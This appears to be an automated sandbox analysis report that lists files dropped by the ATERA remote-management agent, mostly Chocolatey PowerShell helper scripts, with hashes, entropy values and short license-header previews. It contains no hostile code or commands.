                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyZipPackage {..<#...SYNOPSIS..Downloads file from a url and unzips it on your machine. Use..Get-ChocolateyUnzip when local or embedded file......DESCRIPTION..This wi

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-Vsix.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.225120339484231
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoM4eAjm3LeoXPNpxdeVP3YJxxKW2W2VlWp:cSyL+4pGXHFKoZjmnP3OVPUxxO3le
                                                                                                                                                                                                                                                                                              MD5:5082284C6F295B50B7C28303E52D2770
                                                                                                                                                                                                                                                                                              SHA1:08D320C56CA725CFC8D558E5C923836EDC369DFD
                                                                                                                                                                                                                                                                                              SHA-256:D488957D7BEFF9256A176E7EA1F6D167604C175B44746B2B86B7EA0480F8089C
                                                                                                                                                                                                                                                                                              SHA-512:F8AB98CD8A14ADFA9FED578867A6188F6CBCA5E4361FC0D17D5BAA49818DF7A24BE94C616A8FE6821B75FDCE853D426464BA8E6CE8824E2A47912F26204A8241
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-Vsix {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Installs a VSIX package into a particular version of Visual Studio......NOTES..This is not par

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-EnvironmentVariable.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4463
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.326623524611151
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKo9LAVZVTfGqqHQ6+MiLMK+SIgEGZkxpU3gZCjfocO:cSyL+QGXHvAVLGqqHQ6waN9A3a
                                                                                                                                                                                                                                                                                              MD5:C5ADB094F8B04B9D9E4E7FA429D0568F
                                                                                                                                                                                                                                                                                              SHA1:64A4EC9D365702E1D279F0958B67EDAAC1CCFF72
                                                                                                                                                                                                                                                                                              SHA-256:A7E60AA5802ADC6E16D105C693819D7B8F5396C9B18BB32D4E55A1C6EDDEE409
                                                                                                                                                                                                                                                                                              SHA-512:20654DDEBFB81F1AA49BBBA3CF9C8BB2A03DA48C1D14DC63F4C200F8374393430E2515D85EE39B3EC788EFD97F8D442F07D36C06595263D57D6FEACA5B9DE152
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Set-EnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-Scope 'Machine'.`....DO NOT USE. Not part of the public API. Use..`Install-ChocolateyEnviron

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Set-PowerShellExitCode.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1711
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.130959499082034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyX54q90AlH31KofO/OuBT0fkaCVYBt4PHU:cSyp4aXHFKozUVYBt4c
                                                                                                                                                                                                                                                                                              MD5:73DCA113BBA352B82F814797A5E075B5
                                                                                                                                                                                                                                                                                              SHA1:B514007F4B97D41584B73A1BFFBE24B37131CCD1
                                                                                                                                                                                                                                                                                              SHA-256:A4F55463BF3258F02058B8A568A4F650B6DEA54BE1E5851C9339D53DBA2CC08F
                                                                                                                                                                                                                                                                                              SHA-512:9F0D8D5B5C418BDBD9034EF8BFEBA20D4F1D99B37F4DE7867102E6486BA6F5BA7D9CB5C34E7D9649546B74E81B6E238EB8CBA8BB458C7A0AFBC975B49ED04011
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Set-PowerShellExitCode {..<#...SYNOPSIS..Sets the exit code for the PowerShell scripts......DESCRIPTION..Sets the exit code as an environment variable that is checked and used..as the exit code for the package at the end of the package script......NOTES..This tells PowerShell that it should prepare to shut down....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16063
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.071535838625921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXH8SvdSIVLWDL+G3YQwJOm1JzzN566OdHYrZxmrP17OrnwflAflNKc1+R:ctL+QGRvdSIWDznmzzvOUrIWjKEM05q
                                                                                                                                                                                                                                                                                              MD5:C653DD51F0E2EF62BBD7F782C8DAE3AC
                                                                                                                                                                                                                                                                                              SHA1:860325CDDF15E97C487A2351051517C89E414316
                                                                                                                                                                                                                                                                                              SHA-256:120D4F0ECD7D4AF742CCE72D4CE86EBD960F3FC83FBB58860BECD79147830585
                                                                                                                                                                                                                                                                                              SHA-512:417FD7B7609E7F002F8915D0E8EDA8EB3932FE3F4F7D88070457D2B08251CF0063C3B283C2129A02BAD6361812A16CDD1F3DFB26F55043181F9680D8B073B32E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Start-ChocolateyProcessAsAdmin {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Runs a process with administrative privileges. If `-ExeToRun` is not..specified, it is r

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Test-ProcessAdminRights.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1913
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.085202352125102
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMwr86KhPWBT2TiCWezzwYYm6tFnzXHtQ:cSyL+4pGXHFKo2PD2CWbm6nnzXq
                                                                                                                                                                                                                                                                                              MD5:12DE733D7CE18AF405D81469211573D3
                                                                                                                                                                                                                                                                                              SHA1:89C23822D6717F00281EC45FB24F420678B9901B
                                                                                                                                                                                                                                                                                              SHA-256:F07208BE10E70B4774168EC7C0CC86FC594F1D37D991E766EC46EE335302B083
                                                                                                                                                                                                                                                                                              SHA-512:38775567CC21292C3E06E6F7A44BC7A3C525CC2A49A95E114CFB0C4BFF2AF7EDAEFB4D09A3FD777482BCB0088507323B5618128B96A4716BE9655010A390453F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Test-ProcessAdminRights {..<#...SYNOPSIS..Tests whether the current process is running with administrative rights......DESCRIPTION..This function checks whether the current process h

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\UnInstall-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2897
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162176606162476
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMjgAOTJEd4phQ44Yb1eVGXsjlKo9obKB9x/kgeoS5:cSyL+4pGXHFKod+aSZVLjo7m1Ju5
                                                                                                                                                                                                                                                                                              MD5:B0DDD1F261098CAF4092E78539A61796
                                                                                                                                                                                                                                                                                              SHA1:6F753444CE488773EC7AD4942BFB79BF79BC2A65
                                                                                                                                                                                                                                                                                              SHA-256:12E80EA9AA3D894DB1BB1999DD766EF4925ECD59FEC8DEDCABF241DE96E1A949
                                                                                                                                                                                                                                                                                              SHA-512:5C624D18321916C905287595ECC72CF996F24F27E68E22F35C1D07AD7004F579EE64D3E0AE5AE6867DE13A02E61F9893D3DB848A82D41FEC309C77DD88752F75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyZipPackage {..<#...SYNOPSIS..Uninstalls a previous installed zip package, may not be necessary......DESCRIPTION..This will uninstall a zip file if installed via I

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-BinFile.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.175198661740516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKo2fFecAVuAlxoVGv5nPcdTmqKYDqnShM:cSyL+QGXHc0nVuAlOVGvpPcdTmx
                                                                                                                                                                                                                                                                                              MD5:FCD698961855179908D84E45C1699CD3
                                                                                                                                                                                                                                                                                              SHA1:449CF377EA5EEFC250DF24DC64F36F374C3EA022
                                                                                                                                                                                                                                                                                              SHA-256:093191162E950B4CFDCDD066865C74E47F3F05B3543A9A98A7B82AD98C8236CA
                                                                                                                                                                                                                                                                                              SHA-512:96C0B5867C19A9F06C81F507102FDBCC270BEBAB132E8A3EDE88CED129E369D282AC5F874B0F0AB94214C41C857EF74735909045AA3FDACFF96C74A38FA7AFB6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-BinFile {..<#...SYNOPSIS..Removes a shim (or batch redirect) for a file......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\bin`..included in t

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3131
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1027007896112115
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyX54q90AlH31KoMSta1Qr44qR4MXbVqlzmwETvp6SCodQsV:cSyp4aXHFKovRVKVwETB6SCu
                                                                                                                                                                                                                                                                                              MD5:256F7D3F77746A9167E513497A1DEF85
                                                                                                                                                                                                                                                                                              SHA1:0F213C21586F176C405C1877C6E7D2FD5B8E85AC
                                                                                                                                                                                                                                                                                              SHA-256:4CE0A48B7A6D6FE997324F7F916DEA532754E4C371CEE38CACE5134EA1D3A101
                                                                                                                                                                                                                                                                                              SHA-512:763263F5E68A1CB7391394570A7CCDDAF518A1522E3F0435EA62848631A03CF278E15F6375F02C0466CBEEBB4365BA419ADB3AB6549BA3BCB09C9BB718825F03
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Removes a persistent environment variable......DESCRIPTION..Uninstall-ChocolateyEnvironmentVariable removes an environment variable..with the specified name and value. The variable c

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Uninstall-ChocolateyPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6062
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047713257621158
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKoQ79vUU2ZTooaYjuVSQPsVeqYQfiyLi9xSQeSDHyXfOWQfpQf6:cSyL+QGXHweZdlFV8bQ7ov
                                                                                                                                                                                                                                                                                              MD5:39599553B392FDEA36398A474FD623F2
                                                                                                                                                                                                                                                                                              SHA1:89587AEDEC8ECADD274EE80EE43101032A55BAD4
                                                                                                                                                                                                                                                                                              SHA-256:716E51F45EA009C6AEC10F123C58A837516E59910CD0DFB274DF0FF6A56EBF08
                                                                                                                                                                                                                                                                                              SHA-512:1BA55A2CEC0EA911B3418FA8B1979EE8EF45C16033C82F1794416CA85D8F7D9B2618855008F8014BD1FA2A8466ECEB9E36A41E985122F8D04C765051C6DAF5C0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyPackage {..<#...SYNOPSIS..Uninstalls software from "Programs and Features"......DESCRIPTION..This will uninstall software from your machine (in Programs and..Feat

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Update-SessionEnvironment.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3611
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0574071891740795
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKosxHb1u5jen+UMGeKJ1qeg:cSyL+QGXHWp+i5MzK/g
                                                                                                                                                                                                                                                                                              MD5:AB7F32D92867D5CC52CB177374C656C2
                                                                                                                                                                                                                                                                                              SHA1:ACB20AAADD71C921899DE91640DA2AB5F78984CA
                                                                                                                                                                                                                                                                                              SHA-256:A1AD9ED3C049CA14C7970AA17CF5C6A28448E70FF2BE4E438A61C6DAB68E82B7
                                                                                                                                                                                                                                                                                              SHA-512:22295E4C289EC0057B3F13A3B9C18B9B02CC4379D8E1F4F6FEBE48A45A05D92A5384EC158E4370CB5E67F33751377C2CD81C4F8E555145C49BF7680FE545F905
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Update-SessionEnvironment {..<#...SYNOPSIS..Updates the environment variables of the current powershell session with..any environment variable changes that may have occured during a.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Write-FunctionCallLogMessage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1974
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.219633769893594
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLA9i9yVMppqTDf3nQytTxGEN8X/+nKB0chWqc:cSyX54q90AlH31KoMYpqfvVF2M1zrvn
                                                                                                                                                                                                                                                                                              MD5:6A2F945A16F003443B3C14907163C357
                                                                                                                                                                                                                                                                                              SHA1:EBDDA9AC96E6F71D0BEED493C5074F2CAFE638C2
                                                                                                                                                                                                                                                                                              SHA-256:279171398D6F65221D4636DA730AB2F07C6DD56321BF76A03D0CA7D3D7B0B574
                                                                                                                                                                                                                                                                                              SHA-512:C09FC9C169D5197B841EED9D44135F43AA8D11CC0463A567E922FE019545C9036542AD40AF5D64B808AF92E143787A8231CBF4F5B8A2F8F94E48614E8E06EFA0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Write-FunctionCallLogMessage {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Writes function call as a debug message......NOTES..Available in 0.10.2+.....This function is not part of the API......INPUTS..None.....OUTPUTS..None.....PARAMETER Invocation..The invocation of the function (`$My

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lastSnapshot.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.632048827786958
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:jqAdGdtGdnn:+hTGF
                                                                                                                                                                                                                                                                                              MD5:FB26701A5D20C5077053DFE015B37875
                                                                                                                                                                                                                                                                                              SHA1:2EA39F4E21B117BEB8517F60D304070DA3A8055D
                                                                                                                                                                                                                                                                                              SHA-256:759B3461F7A0991CC2A036560924ADC50EA1C15C4D17F590EEBD457330157495
                                                                                                                                                                                                                                                                                              SHA-512:42A8832B0523D8F0720BB02C91815E3DBF71EC02C935A947A465FC0E00FFBDCF511D7DFC921DE54669312AE9735B53EDF21957F55A00D60977B1A1325FE496C8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:ecc39e64c8fba863f2e647300224d62f

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):280616
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.691023070642676
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhC6:AJrycoB3HVeESME3pnaVTS1nh7hCav
                                                                                                                                                                                                                                                                                              MD5:30B0542E627055A7D48687D541A9E6BA
                                                                                                                                                                                                                                                                                              SHA1:E12D2EE08CA0566A037824C3D6F4F316F088BD03
                                                                                                                                                                                                                                                                                              SHA-256:170BF6875CF59E62A72FC2E414EA7F1364F9819534D5EE9E453C96E6863BCC35
                                                                                                                                                                                                                                                                                              SHA-512:2694B174D93D13D2C3CF087551CBDB822548195D9582427B20AA9A2D6E1E1DCB362B4612C5D539E9E567812DD589B227738B3B4A631B4A9D3F6AF0E4549584C6
                                                                                                                                                                                                                                                                                              Malicious:true
